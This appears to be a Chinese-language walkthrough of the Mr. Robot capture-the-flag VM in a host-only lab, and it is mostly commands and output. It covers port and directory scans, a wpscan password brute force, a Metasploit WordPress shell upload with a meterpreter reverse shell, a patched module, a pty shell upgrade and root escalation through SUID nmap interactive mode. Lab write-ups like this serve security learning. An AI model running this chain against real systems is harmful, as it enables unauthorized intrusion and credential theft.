关于
信息收集
- 用的是Host-only,所以网卡是vmnet1,IP一直是192.168.7.1/24
nmap -T4 192.168.7.1/24 -A
kali-team@LTS:~$ nmap -T4 192.168.7.1/24 -A
Nmap scan report for 192.168.7.129
Host is up (0.00075s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (2 hosts up) scanned in 47.44 seconds
kali-team@LTS:~$ curl http://192.168.7.129/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
- 发现第一个Key【073403c8a58a1f80d943455fb30724b9】,外加一个字典,下载字典到本地。
- 字典很大,可能有重复的,先优化一下。
sort fsocity.dic | uniq > list.dic
nikto -h http://192.168.7.129
kali-team@LTS:~/桌面$ nikto -h http://192.168.7.129
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.7.129
+ Target Hostname: 192.168.7.129
+ Target Port: 80
+ Start Time: 2018-06-19 20:37:10 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ IP address found in the 'x-mod-pagespeed' header. The IP is "1.9.32.3".
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Uncommon header 'x-mod-pagespeed' found, with contents: 1.9.32.3-4523
+ Retrieved x-powered-by header: PHP/5.5.29
+ Uncommon header 'x-pingback' found, with contents: http://192.168.7.129/xmlrpc.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.7.129/?p=23>; rel=shortlink
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ 6544 items checked: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2018-06-19 20:39:38 (GMT8) (148 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- 通过nikto简单扫描或者用dirsearch扫一下目录
kali-team@LTS:~/桌面$ dirsearch -u http://192.168.7.129 -e * |grep 200
[20:42:35] 301 - 235B - /admin -> http://192.168.7.129/admin/
[20:42:36] 200 - 1KB - /admin/
[20:42:36] 200 - 1KB - /admin/?/login
[20:42:38] 200 - 1KB - /admin/index
[20:42:38] 200 - 1KB - /admin/index.html
[20:42:41] 301 - 0B - /admin_area/index.php -> http://192.168.7.129/admin_area/
[20:43:15] 200 - 0B - /favicon.ico
[20:43:23] 200 - 1KB - /index.html
[20:43:25] 200 - 504KB - /intro
[20:43:28] 200 - 309B - /license.txt
[20:43:50] 200 - 64B - /readme
[20:43:50] 200 - 64B - /readme.html
[20:43:51] 200 - 41B - /robots.txt
[20:43:56] 200 - 0B - /sitemap
[20:43:56] 200 - 0B - /sitemap.xml
[20:43:56] 200 - 0B - /sitemap.xml.gz
[20:44:12] 200 - 0B - /wp-content/
[20:44:12] 200 - 0B - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[20:44:12] 200 - 3KB - /wp-login
[20:44:12] 200 - 3KB - /wp-login.php
[20:44:12] 200 - 3KB - /wp-login/
- 明显是一个WordPress,但是没有看到有用户发文章。打开登录页面枚举用户名,百度Mr.Robot发现黑客军团的主角叫
Elliot
,现在他提示密码错误了,说明用户名是对的。然后用刚刚发现的字典爆破。 wpscan -u http://192.168.7.129 --username Elliot --wordlist list.dic
[+] Enumerating plugins from passive detection ...
[+] No plugins found passively
[+] Starting the password brute forcer
[+] [SUCCESS] Login : Elliot Password : ER28-0652
Brute Forcing 'Elliot' Time: 00:01:21 <============================================================= > (5637 / 11452) 49.22% ETA: 00:01:24
+----+--------+------+-----------+
| ID | Login | Name | Password |
+----+--------+------+-----------+
| | Elliot | | ER28-0652 |
+----+--------+------+-----------+
[+] Finished: Tue Jun 19 21:22:23 2018
[+] Elapsed time: 00:01:22
[+] Requests made: 5703
[+] Memory used: 32.516 MB
GetShell
- 第一种就是以前的登录改主题404模板
- 第二种要用到Metasploit,看自己喜欢。一个大坑!
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD ER28-0652 yes The WordPress password to authenticate with
PAYLOAD_NAME Kali-Team yes Fix By Kali-Team payload_name to update with
PLUGIN_NAME WordPress yes Fix By Kali-Team plugin_name to update with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.7.129 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME Elliot yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.7.1 yes The listen address (an interface may be specified)
LPORT 7788 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf exploit(unix/webapp/wp_admin_shell_upload) > set password ER28-0652
password => ER28-0652
msf exploit(unix/webapp/wp_admin_shell_upload) > set username Elliot
username => Elliot
msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.7.129
rhost => 192.168.7.129
msf exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.7.1:4444
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
-
报错了,Google修复,可以上传,但是反弹不会来插件的路径。
/opt/metasploit-framework/embedded/framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
用#注释掉下面两行
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
再重新载入模块
msf exploit(unix/webapp/wp_admin_shell_upload) > reload
[*] Reloading module...
msf exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.7.1:7788
[*] Authenticating with WordPress using Elliot:ER28-0652...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/WordPress/Kali-Team.php...
[*] Sending stage (37775 bytes) to 192.168.7.129
[*] Meterpreter session 5 opened (192.168.7.1:7788 -> 192.168.7.129:36273) at 2018-06-19 23:13:10 +0800
ls
[!] This exploit may require manual cleanup of 'Kali-Team.php' on the target
[!] This exploit may require manual cleanup of 'WordPress.php' on the target
[!] This exploit may require manual cleanup of '../WordPress' on the target
提权
- 在robot用户的目录下找到了第二个Key,但是没权限查看。
meterpreter > ls
Listing: /home/robot
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100400/r-------- 33 fil 2015-11-13 15:28:21 +0800 key-2-of-3.txt
100644/rw-r--r-- 39 fil 2015-11-13 15:28:21 +0800 password.raw-md5
meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
- 把MD5破解出来,应该就是robot的密码了。
- 但是su在反弹回来的shell中执行不了。
su: must be run from a terminal
- 转py可以进入交互模式
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
- 第二个Key找到了!
- 最后提升到root权限,找开启了SUID权限的应用
robot@linux:/$ cd /root
cd /root
bash: cd: /root: Permission denied
robot@linux:/$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:/$
- 低版本的nmap可以用交互模式,而且上面说的是root权限。!后面接着命令就可以了。
robot@linux:/$ nmap --help
nmap --help
Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service & app names/versions
-sR RPC scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p <range> ports to scan. Example range: 1-1024,1080,6666,31337
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
-iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
robot@linux:/$
robot@linux:/$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !id
!id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
waiting to reap child : No child processes
nmap>
Unknown command (ls) -- press h <enter> for help
nmap/> !ls
!ls
bin dev home lib lost+found mnt proc run srv tmp var
boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
waiting to reap child : No child processes
nmap> !ls /root
!ls /root
firstboot_done key-3-of-3.txt
waiting to reap child : No child processes
nmap> cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
Unknown command (cat) -- press h <enter> for help
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
waiting to reap child : No child processes
nmap>
彩蛋
- 其实账号密码别人已经给你了
http://192.168.7.129/license.txt
- 拿到
ZWxsaW90OkVSMjgtMDY1Mgo=
- base64解一下
echo ZWxsaW90OkVSMjgtMDY1Mgo= |base64 --decode
- elliot:ER28-0652